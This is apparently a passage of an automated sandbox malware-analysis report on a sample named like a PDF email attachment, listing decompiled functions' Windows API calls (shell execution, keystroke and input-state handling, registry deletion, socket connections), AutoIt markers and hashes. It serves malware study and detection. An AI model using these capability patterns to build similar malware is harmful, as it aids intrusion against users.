                                                                                                          • Opcode ID: ad6e1b46698717ffedf42f8d650d6640ee2110fbf2612f75ba2349017529f84f
                                                                                                          • Instruction ID: 016308b0ec3a8affbcdaa1fb683abd397d3f1804982636e9ecc74e6ffd319d86
                                                                                                          • Opcode Fuzzy Hash: ad6e1b46698717ffedf42f8d650d6640ee2110fbf2612f75ba2349017529f84f
                                                                                                          • Instruction Fuzzy Hash: F081D471204300EBD710EF24CC89FAAB7E8AF84714F14491DF9569B292DBB8ED04CB92
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 78906a2aaed1082391cc1d5eaafcadb6bbad9d6aeebc8e42cf31d37e38345db0
                                                                                                          • Instruction ID: 16f62a135661b4ee7d65f9d3a30dd06071ef6ef2bbf2983d3d45d1f7590998f3
                                                                                                          • Opcode Fuzzy Hash: 78906a2aaed1082391cc1d5eaafcadb6bbad9d6aeebc8e42cf31d37e38345db0
                                                                                                          • Instruction Fuzzy Hash: 9D718A30900109EFCB04DF98CC89AFEBB79FF85312F648159F915AA251D778AA15CBA4
                                                                                                          APIs
                                                                                                          • IsWindow.USER32(00E55C18), ref: 007DB3EB
                                                                                                          • IsWindowEnabled.USER32(00E55C18), ref: 007DB3F7
                                                                                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 007DB4DB
                                                                                                          • SendMessageW.USER32(00E55C18,000000B0,?,?), ref: 007DB512
                                                                                                          • IsDlgButtonChecked.USER32(?,?), ref: 007DB54F
                                                                                                          • GetWindowLongW.USER32(00E55C18,000000EC), ref: 007DB571
                                                                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 007DB589
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                          • String ID:
                                                                                                          • API String ID: 4072528602-0
                                                                                                          • Opcode ID: c7a4ea791116d35935bbd19a9ff3f3cc66ae890f6247e2c2b9671d311c121d35
                                                                                                          • Instruction ID: bf03501fdfa82f0569a093f059d12312dd37a3a9195b293958d6ddea2f99eedd
                                                                                                          • Opcode Fuzzy Hash: c7a4ea791116d35935bbd19a9ff3f3cc66ae890f6247e2c2b9671d311c121d35
                                                                                                          • Instruction Fuzzy Hash: 6471AD34605244EFDB21DFA4C894FFA7BB9FF49300F15806AEA46973A2C739A950DB50
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 007CF448
                                                                                                          • _memset.LIBCMT ref: 007CF511
                                                                                                          • ShellExecuteExW.SHELL32(?), ref: 007CF556
                                                                                                            • Part of subcall function 00759837: __itow.LIBCMT ref: 00759862
                                                                                                            • Part of subcall function 00759837: __swprintf.LIBCMT ref: 007598AC
                                                                                                            • Part of subcall function 0076FC86: _wcscpy.LIBCMT ref: 0076FCA9
                                                                                                          • GetProcessId.KERNEL32(00000000), ref: 007CF5CD
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 007CF5FC
                                                                                                          Similarity
                                                                                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                          • String ID: @
                                                                                                          • API String ID: 3522835683-2766056989
                                                                                                          • Opcode ID: 45d7330e613e30c90dc9b9dc548758498b6b27bef13ca4d6568defdfbc4ba021
                                                                                                          • Instruction ID: 21634f8f11953b282e5500912aac8441270ba515c1471b4cefedab4780d20c9a
                                                                                                          • Opcode Fuzzy Hash: 45d7330e613e30c90dc9b9dc548758498b6b27bef13ca4d6568defdfbc4ba021
                                                                                                          • Instruction Fuzzy Hash: 3461AD75A00619DFCB14DF64C885AAEBBB5FF49310F14806DE81AAB351CB78AE45CB90
                                                                                                          APIs
                                                                                                          • GetParent.USER32(?), ref: 007B0F8C
                                                                                                          • GetKeyboardState.USER32(?), ref: 007B0FA1
                                                                                                          • SetKeyboardState.USER32(?), ref: 007B1002
                                                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 007B1030
                                                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 007B104F
                                                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 007B1095
                                                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 007B10B8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                          • String ID:
                                                                                                          • API String ID: 87235514-0
                                                                                                          • Opcode ID: 4362735814fc2240f4c67b52c8a6f3840796f7b89b0e8e781370e469bb630c22
                                                                                                          • Instruction ID: b1591e7e2e58eef3532288277df547a829f8adbc7baf5012d120010e29971b99
                                                                                                          • Opcode Fuzzy Hash: 4362735814fc2240f4c67b52c8a6f3840796f7b89b0e8e781370e469bb630c22
                                                                                                          • Instruction Fuzzy Hash: 7251E3606047D57DFB3652388C29BF7BFA96B06304F888589E1D5468C2C29CDCD4D751
                                                                                                          APIs
                                                                                                          • GetParent.USER32(00000000), ref: 007B0DA5
                                                                                                          • GetKeyboardState.USER32(?), ref: 007B0DBA
                                                                                                          • SetKeyboardState.USER32(?), ref: 007B0E1B
                                                                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007B0E47
                                                                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007B0E64
                                                                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007B0EA8
                                                                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007B0EC9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                          • String ID:
                                                                                                          • API String ID: 87235514-0
                                                                                                          • Opcode ID: f26a431a2fffe40a962dc39107a5ca58c410a4554c5db10f3f4187c2908e3ec8
                                                                                                          • Instruction ID: 3f3378026f5778c995c86a6d37efb9eea1cbf45271afe4f027016aba6867a2c3
                                                                                                          • Opcode Fuzzy Hash: f26a431a2fffe40a962dc39107a5ca58c410a4554c5db10f3f4187c2908e3ec8
                                                                                                          • Instruction Fuzzy Hash: 5251E4A0A447D57DFB3293748C55BFBBFA96B06300F088889F1D5468C2D399EC98D7A0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsncpy$LocalTime
                                                                                                          • String ID:
                                                                                                          • API String ID: 2945705084-0
                                                                                                          • Opcode ID: 11f48fcb4073d499415622bcb711ba63da6c0449166f9dea4441cb537bb94cc2
                                                                                                          • Instruction ID: 3fb3b75e22224da857013a6c92a8c7111e860384df52398a39417f2054f85c06
                                                                                                          • Opcode Fuzzy Hash: 11f48fcb4073d499415622bcb711ba63da6c0449166f9dea4441cb537bb94cc2
                                                                                                          • Instruction Fuzzy Hash: 76418565C10614B6CF11EBB48C4ABCFB3B89F05350F50C966E51CE3222FB38A655C7AA
                                                                                                          APIs
                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007AD5D4
                                                                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007AD60A
                                                                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 007AD61B
                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007AD69D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                          • String ID: ,,~$DllGetClassObject
                                                                                                          • API String ID: 753597075-463960871
                                                                                                          • Opcode ID: befda2374fdea9f11846c6144bfbd127b519c92277448e8a633c320493a09c7f
                                                                                                          • Instruction ID: 469d6aad7b2eadaeb1ad7276fea36dc3344ac5331d677155f5776d029859ff4c
                                                                                                          • Opcode Fuzzy Hash: befda2374fdea9f11846c6144bfbd127b519c92277448e8a633c320493a09c7f
                                                                                                          • Instruction Fuzzy Hash: CE41C2B1601204EFDB24CF54C884A9A7BB9EF85350F1582A9FC0ADF205D7B9DD40CBA0
                                                                                                          APIs
                                                                                                          • GetCursorPos.USER32(?), ref: 00752357
                                                                                                          • ScreenToClient.USER32(008157B0,?), ref: 00752374
                                                                                                          • GetAsyncKeyState.USER32(00000001), ref: 00752399
                                                                                                          • GetAsyncKeyState.USER32(00000002), ref: 007523A7
                                                                                                          Strings
                                                                                                          • 036210c621026210062101621086210962105621056210e6210c621086210b62104621056210f6210c621006210f6210b621076210462108621006210662103621, xrefs: 0078BFF9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AsyncState$ClientCursorScreen
                                                                                                          • String ID: 036210c621026210062101621086210962105621056210e6210c621086210b62104621056210f6210c621006210f6210b621076210462108621006210662103621
                                                                                                          • API String ID: 4210589936-1561487433
                                                                                                          • Opcode ID: f3e0075bcb66267d61ae3df29163de12e915687e760a8668ba4b75b27bc6b43e
                                                                                                          • Instruction ID: 91ecf4e498bbec5a2725b1b409a002e07da1458fd43251b3364a8eb2ed0661cc
                                                                                                          • Opcode Fuzzy Hash: f3e0075bcb66267d61ae3df29163de12e915687e760a8668ba4b75b27bc6b43e
                                                                                                          • Instruction Fuzzy Hash: 3041A235604109FBDF259F68CC48AEDBB74FB06361F20435AF829922A1C7799D54DFA0
                                                                                                          APIs
                                                                                                            • Part of subcall function 007B466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007B3697,?), ref: 007B468B
                                                                                                            • Part of subcall function 007B466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007B3697,?), ref: 007B46A4
                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 007B36B7
                                                                                                          • _wcscmp.LIBCMT ref: 007B36D3
                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 007B36EB
                                                                                                          • _wcscat.LIBCMT ref: 007B3733
                                                                                                          • SHFileOperationW.SHELL32(?), ref: 007B379F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                          • String ID: \*.*
                                                                                                          • API String ID: 1377345388-1173974218
                                                                                                          • Opcode ID: 358a3f435a38383f10cb70ce81e87dfa687ecba4f9d01b5f95f5da17705a64f1
                                                                                                          • Instruction ID: ab0c1b55d31053f62428ecf5ae0e8f860b7190910aa5734e506ef152b6efd50f
                                                                                                          • Opcode Fuzzy Hash: 358a3f435a38383f10cb70ce81e87dfa687ecba4f9d01b5f95f5da17705a64f1
                                                                                                          • Instruction Fuzzy Hash: 784180B1508344AEC751EF64C845ADFB7E8EF89384F10483EF49AC3251EA38D689C756
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 007D72AA
                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D7351
                                                                                                          • IsMenu.USER32(?), ref: 007D7369
                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007D73B1
                                                                                                          • DrawMenuBar.USER32 ref: 007D73C4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 3866635326-4108050209
                                                                                                          • Opcode ID: e136ab32dc37a4d94ad3c5f437ff4f1cace1c99e9dcb9816cef255e825e3f72e
                                                                                                          • Instruction ID: 64c64214ba8153fc2dd1b82cad66a0db3465e7e045da9291182705868993b5f4
                                                                                                          • Opcode Fuzzy Hash: e136ab32dc37a4d94ad3c5f437ff4f1cace1c99e9dcb9816cef255e825e3f72e
                                                                                                          • Instruction Fuzzy Hash: C3412575A04248EFDB24DF50D884AAABBB8FF08310F14852AFD15AB350E734AD50DB60
                                                                                                          APIs
                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 007D0FD4
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007D0FFE
                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 007D10B5
                                                                                                            • Part of subcall function 007D0FA5: RegCloseKey.ADVAPI32(?), ref: 007D101B
                                                                                                            • Part of subcall function 007D0FA5: FreeLibrary.KERNEL32(?), ref: 007D106D
                                                                                                            • Part of subcall function 007D0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 007D1090
                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 007D1058
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 395352322-0
                                                                                                          • Opcode ID: 21e187f5ac59f714bbe2177645dcbf1491b40c81d3d18c8f4cd0b8149b1f0ef1
                                                                                                          • Instruction ID: 6f0aaad1e970c78583e1120b4b51135610d60bc293b713d17624a1cda8e3af1d
                                                                                                          • Opcode Fuzzy Hash: 21e187f5ac59f714bbe2177645dcbf1491b40c81d3d18c8f4cd0b8149b1f0ef1
                                                                                                          • Instruction Fuzzy Hash: F7310D71901109FFDB15DF90DC89EFFB7BCEF08300F50416AE512E2251EA789E859AA4
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 007D62EC
                                                                                                          • GetWindowLongW.USER32(00E55C18,000000F0), ref: 007D631F
                                                                                                          • GetWindowLongW.USER32(00E55C18,000000F0), ref: 007D6354
                                                                                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 007D6386
                                                                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 007D63B0
                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 007D63C1
                                                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007D63DB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LongWindow$MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 2178440468-0
                                                                                                          • Opcode ID: f3088ec56619f1d6c14313744d7ca72ca224185d32ada863cb9c5b4fd68a5aa4
                                                                                                          • Instruction ID: 1274116ff664bbdee4acfe0af3309ac685874a0e46e270cad0582545b3d8f185
                                                                                                          • Opcode Fuzzy Hash: f3088ec56619f1d6c14313744d7ca72ca224185d32ada863cb9c5b4fd68a5aa4
                                                                                                          • Instruction Fuzzy Hash: F931FE34640250EFDB20CF58DC84F993BF5BB4A714F1981AAF5059B2B2CB79A840DB50
                                                                                                          APIs
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007ADB2E
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007ADB54
                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 007ADB57
                                                                                                          • SysAllocString.OLEAUT32(?), ref: 007ADB75
                                                                                                          • SysFreeString.OLEAUT32(?), ref: 007ADB7E
                                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 007ADBA3
                                                                                                          • SysAllocString.OLEAUT32(?), ref: 007ADBB1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                          • String ID:
                                                                                                          • API String ID: 3761583154-0
                                                                                                          • Opcode ID: 75151dab9c9866eea750eabde1991e58e17fcd4a0c78fd7e4162e56e51b32ac5
                                                                                                          • Instruction ID: f4bfa6ab4bf47b2d09ff29454df8a4383c2bda1286bb3759d3557ebbbddde006
                                                                                                          • Opcode Fuzzy Hash: 75151dab9c9866eea750eabde1991e58e17fcd4a0c78fd7e4162e56e51b32ac5
                                                                                                          • Instruction Fuzzy Hash: 16219576601219AFDF20DFA8DC88CBB73BCEB49360B05C626F956DB250D6789C4187B4
                                                                                                          APIs
                                                                                                            • Part of subcall function 007C7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007C7DB6
                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 007C61C6
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 007C61D5
                                                                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007C620E
                                                                                                          • connect.WSOCK32(00000000,?,00000010), ref: 007C6217
                                                                                                          • WSAGetLastError.WSOCK32 ref: 007C6221
                                                                                                          • closesocket.WSOCK32(00000000), ref: 007C624A
                                                                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007C6263
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 910771015-0
                                                                                                          • Opcode ID: 9c3259472ba1fe25fc60d25c055184f1e2bf02cc790a6fb07b4404f908ef65e5
                                                                                                          • Instruction ID: a96611224f6834d97880fc110eb5c9173d9c23d7895ce1e4c15a4351fb251f95
                                                                                                          • Opcode Fuzzy Hash: 9c3259472ba1fe25fc60d25c055184f1e2bf02cc790a6fb07b4404f908ef65e5
                                                                                                          • Instruction Fuzzy Hash: 92317271600218ABDF10AF64CC89FB977B9EB45761F04806DFD06A7291DB78AD049BA1
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsnicmp
                                                                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                          • API String ID: 1038674560-2734436370
                                                                                                          • Opcode ID: ca778b200f1a762d5f6dcb35cc2dfa25c53a5d2a333032ad2364f14ef9e98e56
                                                                                                          • Instruction ID: 865877d11f47540d831410ea175c12c6ff55a26042a24582d538cf9600ee91fd
                                                                                                          • Opcode Fuzzy Hash: ca778b200f1a762d5f6dcb35cc2dfa25c53a5d2a333032ad2364f14ef9e98e56
                                                                                                          • Instruction Fuzzy Hash: DF2149B2204611E6D630B774AC06EB7739CEF9A350F508639F84A87091EB9C9D42D3D5
                                                                                                          APIs
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007ADC09
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007ADC2F
                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 007ADC32
                                                                                                          • SysAllocString.OLEAUT32 ref: 007ADC53
                                                                                                          • SysFreeString.OLEAUT32 ref: 007ADC5C
                                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 007ADC76
                                                                                                          • SysAllocString.OLEAUT32(?), ref: 007ADC84
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                          • String ID:
                                                                                                          • API String ID: 3761583154-0
                                                                                                          • Opcode ID: 5c2df0fd1407746ad788ff265da8dc8a72d317927605c3bf292e698b8a28081d
